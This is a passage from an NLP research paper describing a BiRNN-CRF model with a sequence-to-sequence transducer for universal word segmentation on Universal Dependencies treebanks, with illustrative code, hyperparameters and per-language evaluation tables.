To enable the model to simultaneously identify non-segmental multiword tokens for languages like Spanish and Arabic in the UD framework, we ex- tend the tagset by adding four tags B, I, E, S that correspond to B, I, E, S to mark corresponding Tags Applied Languages Baseline Tags B, I, E, S Chinese, Japanese, ... Boundary X Russian, Hindi, ... Transduction B, I, E, S Spanish, Arabic, ... Joint Sent. Seg. T, U All languages Table 3: Tag set for universal word segmentation. positions in non-segmental multiword tokens and to indicate their occurrences. As shown in Figure 2, the multiword token qu’environ is split into qu’ and environ and therefore the corresponding tags are BIEBIIIIIE. This contrasts with du, which should be transduced into de and le. Moreover, the extra tags disambiguate whether the multiword to- kens should be split or transduced according to the context. For instance, AÜØð (wamimma) in Arabic is occasionally split into ð (wa) and AÜØ (mimma) but more frequently transduced into ð (wa), áÓ (min) and AÓ (ma) . The corresponding tags are SBIE and BIIE, respectively. The transduction of the identi- fied multiword tokens will be described in detail in the following section. The complete tagset is summarised in Table 3. The proposed sequence model can easily be ex- tended to perform joint sentence segmentation by adding two more tags to mark the last character of a sentence (de Lhoneux et al., 2017). T is used if the character is a single-character word and U otherwise. T and U can be used together with B, I, E, S, X for general segmentation, or with B, I, E, S additionally for full UD processing. Joint sentence segmentation is not addressed any further in this paper. 5 Neural Networks for Segmentation 5.1 Main network The main network for regular segmentation as well as non-segmental multiword token identification is an adaptation of the BiRNN-CRF model (Huang et al., 2015) (see Figure 3). The input characters can be represented as con- 424 夏 天 太 热 (too) (hot)(summer) character representations GRU GRU GRU GRU forward RNN GRU GRU GRU GRU backward RNN B E S S CRF layer 太 热夏天output Figure 3: The BiRNN-CRF model for segmentation. The dashed arrows indicate that dropout is applied. ventional character embeddings. Alternatively, we employ the concatenated 3-gram model introduced by Shao et al. (2017). In this representation (Fig- ure 4), the pivot character in a given context is rep- resented as the concatenation of the character vec- tor representation along with the local bigram and trigram vectors. The concatenated n-grams encode rich local information as the same character has dif- ferent yet closely related vector representations in different contexts. For each n-gram order, we use a single vector to represent the terms that appear only once in the training set while training. These vectors are later used as the representations for unknown characters and n-grams in the development and test sets. All the embedding vectors are initialised ran- domly. The character vectors are passed to the forward and backward recurrent layers. Gated recurrent units (GRU) (Cho et al., 2014) are employed as the basic recurrent cell to capture long term dependencies and sentence-level information. Dropout (Srivastava et al., 2014) is applied to both the inputs and the out- puts of the bidirectional recurrent layers. A first- order chain CRF layer is added on top of the recur- 夏 天 太 热 (too) (hot)(summer) Vi,i Vi−1,i Vi−1,i+1 n-gram character representation V3 Figure 4: Concatenated 3-gram model. 
The third character is the pivot character in the given context. rent layers to incorporate transition information be- tween consecutive tags, which ensures that the op- timal sequence of tags over the entire sentence is obtained. The optimal sequence can be computed efficiently via the Viterbi algorithm. 5.2 Transduction The non-segmental multiword tokens identified by the main network are transduced into correspond- ing components in an additional step. Based on the statistics of the multiword tokens to be trans- duced on the entire UD training sets, 98.3% only have one possible transduction, which indicates that the main ambiguity of non-segmental multiword to- kens comes with identification, not transduction. We therefore transduce the identified non-segmental multiword tokens in a context-free fashion. For mul- tiword tokens with two or more valid transductions, we only adopt the most frequent one. In most languages that have multiword tokens, the number of unique non-segmental multiword to- kens is rather limited, such as in Spanish, French and Italian. For these languages, we build dictionar- ies from the training data to look up the multiword tokens. However, in some languages like Arabic and Hebrew, multiword tokens are very productive and therefore cannot be well covered by dictionar- ies generated from training data. Some of the avail- able external dictionary resources with larger cover- age, for instance the MILA lexicon (Itai and Wint- ner, 2008), do not follow the UD standards. In this paper, we propose a generalising ap- proach to processing non-segmental multiword to- kens. If there are more than 200 unique multi- word tokens in the training set for a language, we 425 Character embedding size 50 GRU/LSTM state size 200 Optimiser Adagrad Initial learning rate (main) 0.1 Decay rate 0.05 Gradient Clipping 5.0 Initial learning rate (encoder-decoder) 0.3 Dropout rate 0.5 Batch size 10 Table 4: Hyper-parameters for segmentation. train an attention-based encoder-decoder (Bahdanau et al., 2015) equipped with shared long-short term memory cells (LSTM) (Hochreiter and Schmidhu- ber, 1997). At test time, identified non-segmental multiword tokens are first queried in the dictionary. If not found, the segmented components are gen- erated with the encoder-decoder as character-level transduction. Overall, we utilise rich context to identify non-segmental multiword tokens, and then apply a combination of dictionary and sequence-to- sequence encoder-decoder to transduce them. 5.3 Implementation Our universal word segmenter is implemented us- ing the TensorFlow library (Abadi et al., 2016). Sentences with similar lengths are grouped into the same bucket and padded to the same length. We construct sub-computational graphs for each bucket so that sentences of different lengths are processed more efficiently. Table 4 shows the hyper-parameters adopted for the neural networks. We use one set of parame- ters for all the experiments as we aim for a sim- ple universal model, although fine-tuning the hyper- parameters on individual languages might result in additional improvements. The encoder-decoder is trained prior to the main network. The weights of the neural networks, including the embeddings, are initialised using the scheme introduced in Glo- rot and Bengio (2010). The network is trained us- ing back-propagation. All the random embeddings are fine-tuned during training by back-propagating gradients. Adagrad (Duchi et al., 2011) with mini- batches is employed for optimization. 
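Putting Sections 5.1–5.3 together, the sketch below illustrates the main network and the CRF decoding step. It is written in PyTorch purely for illustration (the paper's implementation uses TensorFlow), it omits the CRF training loss and the encoder-decoder transducer, and all class and argument names are our own; the default sizes follow Table 4.

```python
import torch
import torch.nn as nn

class BiGRUSegmenter(nn.Module):
    """Concatenated 3-gram embeddings -> bidirectional GRU -> per-character
    emission scores. A CRF layer adds an (n_tags x n_tags) transition matrix
    trained with a sentence-level loss; decoding is sketched below."""
    def __init__(self, n_uni, n_bi, n_tri, n_tags, emb=50, hidden=200, p_drop=0.5):
        super().__init__()
        self.uni = nn.Embedding(n_uni, emb)   # index 0 reserved for rare/unknown items
        self.bi = nn.Embedding(n_bi, emb)
        self.tri = nn.Embedding(n_tri, emb)
        self.drop = nn.Dropout(p_drop)
        self.rnn = nn.GRU(3 * emb, hidden, bidirectional=True, batch_first=True)
        self.out = nn.Linear(2 * hidden, n_tags)

    def forward(self, uni_ids, bi_ids, tri_ids):          # each: (batch, seq_len)
        x = torch.cat([self.uni(uni_ids), self.bi(bi_ids), self.tri(tri_ids)], dim=-1)
        h, _ = self.rnn(self.drop(x))
        return self.out(self.drop(h))                      # (batch, seq_len, n_tags)

def viterbi_decode(emissions, transitions):
    """emissions: (seq_len, n_tags); transitions[i, j]: score of moving from tag
    i to tag j. Returns the highest-scoring tag sequence (Viterbi recursion)."""
    seq_len, _ = emissions.shape
    score, backpointers = emissions[0].clone(), []
    for t in range(1, seq_len):
        cand = score.unsqueeze(1) + transitions + emissions[t].unsqueeze(0)
        score, idx = cand.max(dim=0)
        backpointers.append(idx)
    best = [int(score.argmax())]
    for idx in reversed(backpointers):
        best.append(int(idx[best[-1]]))
    return best[::-1]
```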
The initial learning rate η0 is updated with a decay rate ρ. The encoder-decoder is trained with the unique non-segmental multiword tokens extracted from the training set, with 5% of the instances held out for validation. The model is trained for 50 epochs, and the proportion of outputs that exactly match the references is used for selecting the weights. For the main network, word-level F1-score is used to measure the performance of the model after each epoch on the development set. The network is trained for 30 epochs and the weights of the best epoch are selected. To increase efficiency and reduce memory demand both for training and decoding, we truncate sentences longer than 300 characters. At decoding time, the truncated sentences are reassembled at the recorded cut-off points in a post-processing step.

6 Experiments

6.1 Datasets and Evaluation

Datasets from Universal Dependencies 2.0 (Nivre et al., 2016) are used for all the word segmentation experiments (we employ the version that was used in the CoNLL 2017 shared task on UD parsing). In total, there are 81 datasets in 49 languages that vary substantially in size. The training sets are available in 45 languages. We follow the standard splits of the datasets. If no development set is available, 10% of the training set is held out for that purpose.

We adopt word-level precision, recall and F1-score as the evaluation metrics. The candidate and the reference word sequences in our experiments may not share the same underlying characters due to the transduction of non-segmental multiword tokens. The alignment between the candidate words and the references therefore becomes unclear, which makes it difficult to compute the associated scores. To resolve this issue, we use the longest common subsequence algorithm to align the candidate and the reference words. The matched words are compared and the evaluation scores are computed accordingly:

R = |c ∩ r| / |r|        (1)
P = |c ∩ r| / |c|        (2)
F = 2 · R · P / (R + P)  (3)

where c and r denote the sequences of candidate words and reference words, |c| and |r| are their lengths, and |c ∩ r| is the number of candidate words that are aligned to reference words by the longest common subsequence algorithm. The word-level evaluation metrics adopted in this paper are different from the boundary-based alternatives (Palmer and Burger, 1997). We adapt the evaluation script from the CoNLL 2017 shared task (Zeman et al., 2017) to calculate the scores. In the following experiments, we only report the F1-score.

In the following sections, we thoroughly investigate correlations between several language-specific characteristics and segmentation accuracy. All the experimental results in Section 6.2 are obtained on the development sets. The test sets are reserved for final evaluation, reported in Section 6.3.

6.2 Language-Specific Characteristics

6.2.1 Word-Internal Spaces

For Vietnamese and other languages with similar historical backgrounds, such as Zhuang and Hmongic languages (Zhou, 1991), the space-delimited syllables containing no punctuation are never segmented but joined into words with word-internal spaces instead. The space-delimited units can therefore be applied as the basic elements for tag prediction if we pre-split punctuation.

Basic Unit             F1-score    Training Time (s)
Latin Character        82.79       572
Space-delimited Unit   87.62       218

Table 5: Different segmentation units employed for word segmentation on Vietnamese. Concatenated 3-gram is not used.
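Returning to the evaluation metrics of Section 6.1, the LCS alignment and the scores in Eqs. (1)–(3) can be computed as in the following sketch (our own illustration of the procedure described there, not the adapted CoNLL 2017 script).

```python
def lcs_matches(candidate, reference):
    """Number of candidate words aligned to reference words by the longest
    common subsequence, computed with standard dynamic programming."""
    m, n = len(candidate), len(reference)
    dp = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(m):
        for j in range(n):
            dp[i + 1][j + 1] = (dp[i][j] + 1 if candidate[i] == reference[j]
                                else max(dp[i][j + 1], dp[i + 1][j]))
    return dp[m][n]

def word_prf(candidate, reference):
    """Word-level precision, recall and F1-score over aligned words."""
    matched = lcs_matches(candidate, reference)
    p = matched / len(candidate) if candidate else 0.0
    r = matched / len(reference) if reference else 0.0
    f = 2 * p * r / (p + r) if p + r else 0.0
    return p, r, f
```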
Word seg- mentation for these languages thus becomes practi- cally the same as for Chinese and Japanese. Table 5 shows that a substantial improvement can be achieved if we use space-delimited syllables as the basic elements for word segmentation for Viet- namese. It also drastically increases both training and decoding speed as the sequence of tags to be predicted becomes much shorter. 6.2.2 Character Representation We apply regular character embeddings and con- catenated 3-gram vectors introduced in Section 5.1 to the input characters and test their performances 1 2 3 4 5 6 7 8 9 10 0.8 0.9 1 N/300 F 1- S co re Arabic Catalan Chinese English Japanese Spanish Figure 5: Segmentation results with unigram char- acter embeddings (dashed) and concatenated 3-gram vectors for character representations with different numbers of training instances N. respectively. First, the experiments are extensively conducted on all the languages with the full train- ing sets. The results show that the concatenated 3-gram model is substantially better than the regu- lar character embeddings on Chinese, Japanese and Vietnamese, but notably worse on Spanish and Cata- lan. For all the other languages, the differences are marginal. To gain more insights, we select six languages, namely Arabic, Catalan, Chinese, Japanese, English and Spanish for more detailed analysis via learn- ing curve experiments. The training sets are grad- ually extended by 300 sentences at a time. The results are shown in Figure 5. Regardless of the amounts of training data and the other typological factors, concatenated 3-grams are better on Chinese and Japanese and worse on Spanish and Catalan. We expect the concatenated 3-gram representation to outperform simple character embeddings on all languages with a large character set but no space de- limiters. Since adopting the concatenated 3-gram model drastically enlarges the embedding space, in the following experiments, including the final testing phase, concatenated 3-grams are only applied to Chinese, Japanese and Vietnamese. 427 1 2 3 4 5 6 7 8 9 10 0.6 0.7 0.8 0.9 1 N/300 F 1- S co re Arabic Chinese English Korean Russian Spanish Figure 6: Segmentation results with (dashed) and without space delimiters with different numbers of training instances N. 6.2.3 Space Delimiters Chinese and Japanese are not delimited by spaces. Additionally, continuous writing without spaces (scriptio continua) is evidenced in most Classical Greek and Latin manuscripts. We perform two sets of learning curve experiments to investigate the im- pact of white space on word segmentation. In the first set, we keep the datasets in their original forms. In the second set, we omit all white space. The ex- perimental results are presented in Figure 6. In general, there are huge discrepancies between the accuracies with and without spaces, showing that white space acts crucially as a word boundary in- dicator. Retaining the original forms of the space- delimited languages, very high accuracies can be achieved even with small amounts of training data as the model quickly learns that space is a reliable word boundary indicator. Moreover, we obtain rel- atively lower scores on space-delimited languages when space is ignored than Chinese using compara- ble amounts of training data, which shows that Chi- nese characters are more informative to word bound- ary prediction, due to the large character set size. 6.2.4 Non-Segmental Multiword Tokens The concept of multiword tokens is specific to UD. 
To explore how the non-segmental multiword tokens, as opposed to pure segmentation, influence 1 2 3 4 5 6 7 8 9 10 0.8 0.9 1 N/300 F 1- S co re Arabic French Hebrew Italian Portuguese Spanish Figure 7: Segmentation results with and without (dashed) processing non-segmental multiword to- kens with different training instances N. Language Data size Evaluation Scores Training Validation ACC MFS Arabic 3,500 184 77.84 82.64 Hebrew 2,995 157 84.81 92.35 Table 6: Accuracy of the seq2seq transducer on Ara- bic and Hebrew. segmentation accuracy, we conduct relevant experi- ments on selected languages. Similarly to the previ- ous section, two sets of learning curve experiments are performed. In the second set, all the multiword tokens that require transduction are regarded as sin- gle words without being processed. The results are presented in Figure 7. Word segmentation with full UD processing is no- tably more challenging for Arabic and Hebrew. Ta- ble 6 shows the evaluation of the encoder-decoder as the transducer for non-segmental multiword tokens on Arabic and Hebrew. The evaluation metrics ACC and MF-score (MFS) are adapted from the metrics used for machine transliteration evaluation (Li et al., 2009). ACC is exact match and MFS is based on edit distance. The transducer yields relatively higher scores on Hebrew while it is more challenging to process Arabic. In addition, different approaches to transducing the non-segmental multiword tokens are evaluated in Table 7. In the condition None, the identified non- 428 None Dictionary Transducer Mix Arabic 94.11 96.74 96.54 97.27 Hebrew 87.17 91.33 88.46 91.85 Table 7: Segmentation accuracies on Arabic and Hebrew with different ways of transducing non- segmental multiword tokens. segmental multiword tokens remain unprocessed. In Dictionary, they are mapped via the dictionary de- rived from training data if found in the dictionary. In Transducer, they are all transduced by the attention- based encoder-decoder. In Mix, in addition to utilis- ing the mapping dictionary, the non-segmental terms not found in the dictionary are transduced with the encoder-decoder. The results show that when the encoder-decoder is applied alone, it is worse than only using the dictionaries, but additional improve- ments can be obtained by combining both of them. The accuracy differences associated with non- segmental multiword tokens are nonetheless marginal on the other languages as shown in Figure 7. Regardless of their frequent occurrences, mul- tiword tokens are easy to process in general when the set of unique non-segmental multiword tokens is small. 6.2.5 Correlations with Accuracy We investigate the correlations between the pro- posed typological factors in Section 3 and segmen- tation accuracy using linear regression with Huber loss (Huber, 1964). The factors are used in addition to training set size as the features to predict the seg- mentation accuracies in F1-score. To collect more data samples, apart from experimenting with the full training data for each set, we also use smaller sets of 500, 1,000 and 2,000 training instances to train the models respectively if the training set is large enough. The features are standardised with the arith- metic mean and the standard deviation before fitting the linear regression model. The correlation coefficients of the linear regres- sion model are presented in Figure 8. We can see that segmentation frequency and multiword token set size are negatively correlated with segmentation accuracy. 
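The regression described in Section 6.2.5 can be reproduced along the following lines (a sketch using scikit-learn; the feature matrix X, with one row of raw factor values plus training set size per run, and the F1-score vector y are assumed to be prepared beforehand).

```python
from sklearn.linear_model import HuberRegressor
from sklearn.preprocessing import StandardScaler

FACTORS = ["TS", "CS", "LS", "AL", "SF", "MP", "MS"]

def factor_correlations(X, y):
    """Fit a Huber-loss linear regression of F1-scores on the standardised
    factors and return the coefficients, as visualised in Figure 8."""
    X_std = StandardScaler().fit_transform(X)
    model = HuberRegressor().fit(X_std, y)
    return dict(zip(FACTORS, model.coef_))
```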
Overall, the UD datasets are strongly bi- ased towards space-delimited languages. Training set size is therefore not a strong factor as high accu- TS CS LS AL SF MP MS −1 0 1 ·10−2 Figure 8: Correlation coefficients between segmen- tation accuracy and the typological factors in the lin- ear regression model. The factors are training set size (TS), character set size (CS), lexicon size (LS), average word length (AL), segmentation frequency (SF), multitoken word portion (MP) and multitoken word size (MS). racies can be obtained with small amounts of train- ing data, which is consistent with the results of all the learning curve experiments. The other typolog- ical factors such as average word length and lexi- con size are less relevant to segmentation accuracy. Referring back to Figure 1, segmentation frequency and multiword token set size as the most influen- tial factors, are also the primary principal compo- nents that categorise the UD languages into different groups. 6.2.6 Language-Specific Settings Our model obtains competitive results with only a minimal number of straightforward language- specific settings. Based on the previous analysis of segmentation accuracy and typological factors, re- ferring back to Figure 1, we apply the following settings, targeting on specific language groups, to the segmentation system on the final test sets. The language-specific settings can be applied to new lan- guages beyond the UD datasets based on an analysis of the typological factors. 1. For languages with word-internal spaces like Vietnamese, we first separate punctuation and then use space-delimited syllables for bound- 429 Space NLTK UDPipe This Paper 80.86 95.64 99.47 99.45 Table 8: Average evaluation scores on UD lan- guages, excluding Chinese, Japanese, Vietnamese, Arabic and Hebrew. ary prediction. 2. For languages with large character sets and no space delimiters, like Chinese and Japanese, we use concatenated 3-gram representations. 3. For languages with more than 200 unique non- segmental multiword tokens, like Arabic and Hebrew, we use the encoder-decoder model for transduction. 4. For other languages, the universal model is suf- ficient without any specific adaptation. 6.3 Final Results We compare our segmentation model to UDPipe (Straka and Straková, 2017) on the test sets. UDPipe contains word segmentation, POS tagging, morpho- logical analysis and dependency parsing models in a pipeline. The word segmentation model in UD- Pipe is also based on RNN with GRU. For efficiency, UDPipe has a smaller character embedding size and no CRF interface. It also relies heavily on white- space and uses specific configurations for languages in which word-internal spaces are allowed. Auto- matically generated suffix rules are applied jointly with a dictionary query to handle multiword tokens. Moreover, UDPipe uses language-specific hyper- parameters for Chinese and Japanese. We employ UDPipe 1.2 with the publicly avail- able UD 2.0 models.4 The presegmented option is enabled as we assume the input text to be preseg- mented into sentences so that only word segmen- tation is evaluated. In addition, the CoNLL shared task involved some test sets for which no specific training data were available. 
This included a number of parallel test sets of known languages, for which we apply the models trained on the standard tree- banks, as well as four surprise languages, namely Buryat, Kurmanji, North Sami and Upper Sorbian, for which we use the small annotated data samples provided in addition to the test sets by the shared 4http://hdl.handle.net/11234/1-2364 task to build models and evaluation on those lan- guages. The main evaluation results are shown in Table 9. We also report the Macro Average F1-scores. The scores of the surprise languages are excluded and presented separately as no corresponding UDPipe models are available. Our system obtains higher segmentation accuracy overall. It achieves substantially better accuracies on languages that are challenging to segment, namely Chinese, Japanese, Vietnamese, Arabic and Hebrew. The two systems yield very similar scores, when these languages are excluded as shown in Table 8, in which the two systems are also compared with two rule-based baselines, a simple space-based to- keniser and the tokenisation model for English in NLTK (Loper and Bird, 2002). The NLTK model obtains relatively high accuracy while the space- based baseline substantially underperforms, which indicates that relying on white space alone is insuffi- cient for word segmentation in general. On the ma- jority of the space-delimited languages without pro- ductive non-segmental multiword tokens, both UD- Pipe and our segmentation system yield near-perfect scores in Table 9. In general, referring back to Fig- ure 1, languages that are clustered at the bottom-left corner are relatively trivial to segment. The evaluation scores are notably lower on Semitic languages as well as languages without word delimiters. Nonetheless, our system obtains substantially higher scores on the languages that are more challenging to process. For Chinese, Japanese and Vietnamese, our sys- tem benefits substantially from the concatenated 3-gram character representation, which has been demonstrated in Section 6.2.2. Besides, we em- ploy a more fine-grained tagset with CRF loss in- stead of the binary tags adopted in UDPipe. As presented in Zhao et al. (2006), more fine-grained tagging schemes outperform binary tags, which is supported by the experimental results on morpheme segmentation reported in Ruokolainen et al. (2013). We further investigate the merits of the fine- grained tags over the binary tags as well as the ef- fectiveness of the CRF interface by the experiments presented in Table 10 with the variances of our seg- mentation system. The fine-grained tags denote the boundary tags introduced in Table 3. 
The binary 430 Dataset UDPipe This Paper Dataset UDPipe This Paper Dataset UDPipe This Paper Ancient Greek 99.98 99.96 Ancient Greek-PROIEL 99.99 100.0 Arabic 93.77 97.16 Arabic-PUD 90.92 95.93 Basque 99.97 100.0 Bulgarian 99.96 99.93 Catalan 99.98 99.80 Chinese 90.47 93.82 Croatian 99.88 99.95 Czech 99.94 99.97 Czech-CAC 99.96 99.93 Czech-CLTT 99.58 99.64 Czech-PUD 99.34 99.62 Danish 99.83 100.0 Dutch 99.84 99.92 Dutch-LassySmall 99.91 99.96 English 99.05 99.13 English-LinES 99.90 99.95 English-PUD 99.69 99.71 English-ParTUT 99.60 99.51 Estonian 99.90 99.88 Finnish 99.57 99.74 Finnish-FTB 99.95 99.99 Finnish-PUD 99.64 99.39 French 98.81 99.39 French-PUD 98.84 97.23 French-ParTUT 98.97 99.32 French-Sequoia 99.11 99.48 Galician 99.94 99.97 Galician-TreeGal 98.66 98.07 German 99.58 99.64 German-PUD 97.94 97.74 Gothic 100.0 100.0 Greek 99.94 99.86 Hebrew 85.16 91.01 Hindi 100.0 100.0 Hindi-PUD 98.26 98.82 Hungarian 99.79 99.93 Indonesian 100.0 100.0 Irish 99.38 99.85 Italian 99.83 99.54 Italian-PUD 99.21 98.78 Japanese 92.03 93.77 Japanese-PUD 93.67 94.17 Kazakh 94.17 94.21 Korean 99.73 99.95 Latin 99.99 100.0 Latin-ITTB 99.94 100.0 Latin-PROIEL 99.90 100.0 Latvian 99.16 99.56 Norwegian-Bokmaal 99.83 99.89 Norwegian-Nynorsk 99.91 99.97 Old Church Slavonic 100.0 100.0 Persian 99.65 99.62 Polish 99.90 99.93 Portuguese 99.59 99.10 Portuguese-BR 99.85 99.52 Portuguese-PUD 99.40 98.98 Romanian 99.68 99.74 Russian 99.66 99.96 Russian-PUD 97.09 97.28 Russian-SynTagRus 99.64 99.65 Slovak 100.0 99.98 Slovenian 99.93 100.0 Slovenian-SST 99.91 100.0 Spanish 99.75 99.85 Spanish-AnCora 99.94 99.93 Spanish-PUD 99.44 99.39 Swedish 99.79 99.97 Swedish-LinES 99.93 99.98 Swedish-PUD 98.36 99.26 Turkish 98.09 97.85 Turkish-PUD 96.99 96.68 Ukrainian 99.81 99.76 Urdu 100.0 100.0 Uyghur 99.85 97.86 Vietnamese 85.53 87.79 Average 98.63 98.90 Table 9: Evaluation results on the UD test sets in F1-scores. The datasets are represented in the correspond- ing treebank codes. PUD suffix indicates the parallel test data. Two shades of green/red are used for better visualisation, with brighter colours for larger differences. Green represents that our system is better than UDPipe and red is used otherwise. BT BT+CRF FT FT+CRF Chinese 90.54 90.66 90.73 91.28 Japanese 91.54 91.64 91.88 91.94 Vietnamese 87.63 87.95 87.61 87.75 Arabic 94.47 96.74 94.73 97.16 Hebrew 85.34 90.74 85.53 91.98 Table 10: Comparison between the binary tags (BT) and the fine-grained tags (FT) as well as the effec- tiveness of the CRF interface on the development sets. tags include two basic tags B, I plus the correspond- ing tags B, I for non-segmental multiword tokens. White space is marked as I instead of X. The con- catenated 3-grams are not applied. In general, the experimental results confirm that the fine-grained tags are more beneficial except for Vietnamese. The fine-grained tagset contains more structured posi- tional information that can be exploited by the word segmentation model. Additionally, the CRF in- terface leads to notable improvements, especially Arabic French German Hebrew UDPipe 79.34 98.91 94.21 71.87 Our model 91.35 97.50 94.21 86.17 Table 11: Percentages of the correctly processed multiword tokens on the development sets. for Arabic and Hebrew. The combination of the fine-grained tags with the CRF interface achieves substantial improvements over the basic binary tag model that is analogous to UDPipe. 
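For reference, the binary scheme used in this comparison can be derived deterministically from the fine-grained tags. The mapping below reflects our reading of the description above (single-character words collapse to B, while word-internal positions and spaces collapse to I) and is not taken from the paper's code.

```python
def to_binary(tags):
    """Collapse the fine-grained boundary tags to the binary scheme of Table 10.
    The corresponding tags for non-segmental multiword tokens are collapsed in
    the same way (not shown here)."""
    mapping = {"B": "B", "S": "B", "I": "I", "E": "I", "X": "I"}
    return [mapping[t] for t in tags]
```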
For Arabic and Hebrew, apart from greatly bene- fiting from the fine-grained tagset and the CRF inter- face, our model is better at handling non-segmental multiword tokens (Table 11). The attention-based encoder-decoder as the transducer is much more powerful in processing the non-segmental multi- word tokens that are not covered by the dictionary than the suffix rules for analysing multiword tokens in UDPipe. UDPipe obtains higher scores on a few datasets. Our model overfits the small training data of Uyghur 431 Segmentation UDPipe parser Dozat et al. (2017) Accuracy UAS LAS UAS LAS UDPipe This Paper UDPipe This Paper UDPipe This Paper UDPipe This Paper UDPipe This Paper Arabic 93.77 97.16 72.34 78.22 66.41 71.79 77.52 83.55 72.89 78.42 Chinese 90.47 93.82 63.20 67.91 59.07 63.31 71.24 76.33 68.20 73.04 Hebrew 85.16 91.01 62.14 71.18 57.82 66.59 67.61 76.39 64.02 72.37 Japanese 92.03 93.77 78.08 81.77 76.73 80.83 80.21 83.79 79.44 82.99 Vietnamese 85.53 87.79 47.72 50.87 43.10 46.03 50.28 53.78 45.54 48.86 Table 12: Extrinsic evaluations with dependency parsing on the test sets. The parsing accuracies are reported in unlabelled attachment score (UAS) and labelled attachment score (LAS). Space NLTK Sample Transfer Buryat 71.99 97.99 88.07 97.99 (Russian) Kurmanji 78.97 97.37 93.37 96.71 (Spanish) North Sami 79.07 99.20 92.82 99.81 (German) Upper Sorbian 72.35 94.60 93.34 93.66 (Spanish) Table 13: Evaluation on the surprise languages. as it yields 100.0 F1-score on the development set. For a few parallel test sets, there are punctuation marks not found in the training data that cannot be correctly analysed by our system as it is fully data- driven without any heuristic rules for unknown char- acters. The evaluation results on the surprise languages are presented in Table 13. In addition to the seg- mentation models proposed in this paper, we present the evaluation scores of a space-based tokeniser as well as the NLTK model for English. As shown by the previous learning curve experiments in Sec- tion 6.2, very high accuracies can be obtained on the space-delimited languages with only small amounts of training data. However, in case of extreme data sparseness (less than 20 training sentences), such as for the four surprise languages in Table 13 and Kazakh in Table 9, the segmentation results are dras- tically lower even though the surprise languages are all space-delimited. For the surprise languages, we find that applying segmentation models trained on a different language with more training data yields better results than re- lying on the small annotated samples of the target language. Considering that the segmentation model is fully character-based, we simply select the model of the language that shares the most characters with the surprise language as its segmentation model. No annotated data of the surprise language are used for model selection. As shown in Table 13, the transfer approach achieves comparable segmentation accu- racies to NLTK. For space-delimited languages with insufficient training data, it may be beneficial to em- ploy a well-designed rule-based word segmenter as NLTK occasionally outperforms the data-driven ap- proach. As a form of extrinsic evaluation, we test the seg- menter in a dependency parsing setup on the datasets where we obtained substantial improvements over UDPipe. We present results for the transition-based parsing model in UDPipe 1.2 and for the graph- based parser by Dozat et al. (2017). The experimen- tal results are shown in Table 12. 
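The character-overlap heuristic used above to pick a transfer model for the surprise languages can be sketched as follows (our own illustration; the data structures are assumptions).

```python
def pick_transfer_model(surprise_text, training_charsets):
    """training_charsets: {language: set of characters in its training data}.
    Return the language whose character inventory overlaps most with the raw
    text of the surprise language, as a proxy for script similarity."""
    target = set(surprise_text)
    return max(training_charsets,
               key=lambda lang: len(target & training_charsets[lang]))
```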
We can see that word segmentation accuracy has a great impact on parsing accuracy as the segmentation errors propa- gate. Having a more accurate word segmentation model is very beneficial for achieving higher pars- ing accuracy. 7 Related Work The BiRNN-CRF model is proposed by Huang et al. (2015) and has been applied to a number of se- quence labelling tasks, such as part-of-speech tag- ging, chunking and named entity recognition. Our universal word segmenter is a major exten- sion of the joint word segmentation and POS tagging system described by Shao et al. (2017). The origi- nal model is specifically developed for Chinese and only applicable to Chinese and Japanese. Apart from being language-independent, the proposed model in this paper employs an extended tagset and a comple- mentary sequence transduction component to fully process non-segmental multiword tokens that are present in a substantial amount of languages, such as Arabic and Hebrew in particular. It is a gener- alised segmentation and transduction framework. Our universal model is compared with the 432 This Paper Shao Che Björkelund Chinese 93.82 95.21 91.19 92.81 Japanese 93.77 94.79 92.95 91.68 Arabic 97.16 – 93.71 95.53 Hebrew 91.01 – 85.16 91.37 Table 14: Comparison between the universal model and the language-specific models. language-specific model of Shao et al. (2017) in Ta- ble 14. With pretrained character embeddings, en- semble decoding and joint POS tags prediction as introduced in Shao et al. (2017), considerable im- provements over the universal model presented in this paper can be obtained. However, the joint POS tagging system is difficult to generalise as single characters in space-delimited languages are usually not informative for POS tagging. Additionally, com- pared to Chinese, sentences in space-delimited lan- guages have a much greater number of characters on average. Combining the POS tags with segmenta- tion tags drastically enlarges the search space and therefore the model becomes extremely inefficient both for training and tagging. The joint POS tag- ging model is nonetheless applicable to Japanese and Vietnamese. Monroe et al. (2014) present a data-driven word segmentation system for Arabic based on a sequence labelling framework. An extended tagset is designed for Arabic-specific orthographic rules and applied together with hand-crafted features in a CRF frame- work. It obtains 98.23 F1-score on newswire Ara- bic Treebank,5 97.61 on Broadcast News Treebank,6 and 92.10 on the Egyptian Arabic dataset.7 For He- brew, Goldberg and Elhadad (2013) perform word segmentation jointly with syntactic disambiguation using lattice parsing. Each lattice arc corresponds to a word and its corresponding POS tag, and a path through the lattice corresponds to a specific word segmentation and POS tagging of the sentence. The proposed model is evaluated on the Hebrew Tree- bank (Guthmann et al., 2009). The joint word seg- mentation and parsing F1-score (76.95) is reported and compared against the parsing score (85.70) with gold word segmentation. The evaluation scores re- 5LDC2010T13, LDC2011T09, LDC2010T08 6LDC2012T07 7LDC2012E93,98,89,99,107,125, LDC2013E12,21 ported in both Monroe et al. (2014) and Goldberg and Elhadad (2013) are not directly comparable to the evaluation scores on Arabic and Hebrew in this paper, as they are obtained on different datasets. For universal word segmentation, apart from UD- Pipe described in Section 6.3, there are several systems that are developed for specific language groups. 
Che et al. (2017) build a similar Bi-LSTM word segmentation model targeting languages with- out space delimiters like Chinese and Japanese. The proposed model incorporates rich statistics-based features gathered from large-scale unlabelled data, such as character unigram embeddings, character bigram embeddings and the point-wise mutual in- formation of adjacent characters. Björkelund et al. (2017) use a CRF-based tagger for multiword token rich languages like Arabic and Hebrew. A predicted Levenshtein edit script is employed to transform the multiword tokens into their components. The evalu- ation scores on a selected set of languages reported in Che et al. (2017) and Björkelund et al. (2017) are included in Table 14 as well. More et al. (2018) adapt existing morphologi- cal analysers for Arabic, Hebrew and Turkish and present ambiguous word segmentation possibilities for these languages in a lattice format (CoNLL- UL) that is compatible with UD. The CoNLL-UL datasets can be applied as external resources for pro- cessing non-segmental multiword tokens.8 8 Conclusion We propose a sequence tagging model and apply it to universal word segmentation. BiRNN-CRF is adopted as the fundamental segmentation frame- work that is complemented by an attention-based sequence-to-sequence transducer for non-segmental multiword tokens. We propose six typological fac- tors to characterise the difficulty of word segmen- tation cross different languages. The experimental results show that segmentation accuracy is primarily correlated with segmentation frequency as well as the set of non-segmental multiword tokens. Using whitespace as delimiters is crucial to word segmen- tation, even if the correlation between orthographic tokens and words is not perfect. For space-delimited 